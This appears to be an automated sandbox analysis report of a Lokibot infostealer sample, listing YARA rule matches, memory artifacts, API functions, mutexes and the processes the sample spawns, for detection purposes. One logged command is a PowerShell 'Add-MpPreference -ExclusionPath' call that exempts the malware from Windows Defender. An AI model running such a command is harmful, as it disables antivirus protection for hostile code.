            Source: 0.2.file.exe.37bf1e0.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
            Source: 0.2.file.exe.37bf1e0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
            Source: 0.2.file.exe.37d9200.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
            Source: 0.2.file.exe.37d9200.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
            Source: 0.2.file.exe.37d9200.2.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
            Source: 0.2.file.exe.37d9200.2.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
            Source: 0.2.file.exe.37d9200.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
            Source: 3.2.file.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
            Source: 3.2.file.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
            Source: 3.2.file.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
            Source: 3.2.file.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
            Source: 3.2.file.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
            Source: 00000000.00000002.1892387132.00000000037D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
            Source: 00000000.00000002.1892387132.00000000037D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
            Source: 00000000.00000002.1892387132.00000000037D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
            Source: 00000003.00000002.3130771198.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
            Source: 00000003.00000002.3130771198.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
            Source: 00000003.00000002.3130771198.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
            Source: 00000003.00000002.3130771198.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
            Source: 00000003.00000002.3130771198.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
            Source: 00000000.00000002.1892048069.0000000002631000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
            Source: 00000000.00000002.1892048069.0000000002631000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
            Source: 00000000.00000002.1892048069.0000000002631000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
            Source: 00000000.00000002.1892387132.0000000003639000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
            Source: 00000000.00000002.1892387132.0000000003639000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
            Source: 00000000.00000002.1892387132.0000000003639000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
            Source: Process Memory Space: file.exe PID: 7524, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
            Source: Process Memory Space: file.exe PID: 7716, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0246D51C0_2_0246D51C
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_04B16FE80_2_04B16FE8
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_04B100060_2_04B10006
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_04B100400_2_04B10040
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_04B16FD80_2_04B16FD8
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0674B3280_2_0674B328
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_067476600_2_06747660
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_067456B00_2_067456B0
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06745F200_2_06745F20
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_067452780_2_06745278
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06745AE80_2_06745AE8
            Source: C:\Users\user\Desktop\file.exeCode function: 3_2_0040549C3_2_0040549C
            Source: C:\Users\user\Desktop\file.exeCode function: 3_2_004029D43_2_004029D4
            Source: C:\Users\user\Desktop\file.exeCode function: String function: 0041219C appears 45 times
            Source: C:\Users\user\Desktop\file.exeCode function: String function: 00405B6F appears 42 times
            Source: file.exe, 00000000.00000002.1890192784.000000000084E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs file.exe
            Source: file.exe, 00000000.00000002.1892048069.0000000002656000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs file.exe
            Source: file.exe, 00000000.00000002.1901403260.0000000006DCD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs file.exe
            Source: file.exe, 00000000.00000002.1892387132.00000000037F3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs file.exe
            Source: file.exe, 00000000.00000002.1897973404.0000000004F70000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs file.exe
            Source: file.exe, 00000000.00000002.1901699048.00000000070F0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs file.exe
            Source: file.exe, 00000000.00000000.1863082512.0000000000284000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamefSLi.exe6 vs file.exe
            Source: file.exeBinary or memory string: OriginalFilenamefSLi.exe6 vs file.exe
            Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: 0.2.file.exe.37bf1e0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
            Source: 0.2.file.exe.37bf1e0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
            Source: 0.2.file.exe.37bf1e0.1.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
            Source: 0.2.file.exe.37bf1e0.1.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
            Source: 0.2.file.exe.37d9200.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
            Source: 0.2.file.exe.37d9200.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
            Source: 0.2.file.exe.37d9200.2.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
            Source: 0.2.file.exe.37d9200.2.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
            Source: 3.2.file.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
            Source: 3.2.file.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
            Source: 3.2.file.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
            Source: 3.2.file.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
            Source: 3.2.file.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
            Source: 0.2.file.exe.37bf1e0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
            Source: 0.2.file.exe.37bf1e0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
            Source: 0.2.file.exe.37bf1e0.1.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
            Source: 0.2.file.exe.37bf1e0.1.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
            Source: 0.2.file.exe.37bf1e0.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
            Source: 0.2.file.exe.37d9200.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
            Source: 0.2.file.exe.37d9200.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
            Source: 0.2.file.exe.37d9200.2.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
            Source: 0.2.file.exe.37d9200.2.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
            Source: 0.2.file.exe.37d9200.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
            Source: 3.2.file.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
            Source: 3.2.file.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
            Source: 3.2.file.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
            Source: 3.2.file.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
            Source: 3.2.file.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
            Source: 00000000.00000002.1892387132.00000000037D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
            Source: 00000000.00000002.1892387132.00000000037D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
            Source: 00000000.00000002.1892387132.00000000037D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
            Source: 00000003.00000002.3130771198.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
            Source: 00000003.00000002.3130771198.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
            Source: 00000003.00000002.3130771198.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
            Source: 00000003.00000002.3130771198.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
            Source: 00000003.00000002.3130771198.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
            Source: 00000000.00000002.1892048069.0000000002631000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
            Source: 00000000.00000002.1892048069.0000000002631000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
            Source: 00000000.00000002.1892048069.0000000002631000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
            Source: 00000000.00000002.1892387132.0000000003639000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
            Source: 00000000.00000002.1892387132.0000000003639000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
            Source: 00000000.00000002.1892387132.0000000003639000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
            Source: Process Memory Space: file.exe PID: 7524, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
            Source: Process Memory Space: file.exe PID: 7716, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
            Source: file.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: 0.2.file.exe.70f0000.5.raw.unpack, BE5k0LFu5KnoWIB8ne.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.file.exe.381d400.3.raw.unpack, BE5k0LFu5KnoWIB8ne.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.file.exe.70f0000.5.raw.unpack, KQkH3in3AYxtB1JkcI.csSecurity API names: _0020.SetAccessControl
            Source: 0.2.file.exe.70f0000.5.raw.unpack, KQkH3in3AYxtB1JkcI.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.file.exe.70f0000.5.raw.unpack, KQkH3in3AYxtB1JkcI.csSecurity API names: _0020.AddAccessRule
            Source: 0.2.file.exe.381d400.3.raw.unpack, KQkH3in3AYxtB1JkcI.csSecurity API names: _0020.SetAccessControl
            Source: 0.2.file.exe.381d400.3.raw.unpack, KQkH3in3AYxtB1JkcI.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.file.exe.381d400.3.raw.unpack, KQkH3in3AYxtB1JkcI.csSecurity API names: _0020.AddAccessRule
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/8@0/1
            Source: C:\Users\user\Desktop\file.exeCode function: 3_2_0040650A LookupPrivilegeValueW,AdjustTokenPrivileges,3_2_0040650A
            Source: C:\Users\user\Desktop\file.exeCode function: 3_2_0040434D CoInitialize,CoCreateInstance,VariantInit,SysAllocString,VariantInit,VariantInit,SysAllocString,VariantInit,SysFreeString,SysFreeString,CoUninitialize,3_2_0040434D
            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\file.exe.logJump to behavior
            Source: C:\Users\user\Desktop\file.exeMutant created: \Sessions\1\BaseNamedObjects\FDD42EE188E931437F4FBE2C
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7724:120:WilError_03
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_asw2dfr5.xlk.ps1Jump to behavior
            Source: file.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: file.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
            Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: file.exeReversingLabs: Detection: 71%
            Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
            Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\file.exe"
            Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
            Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\file.exe"Jump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"Jump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: dwrite.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: windowscodecs.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: propsys.dllJump to behavior
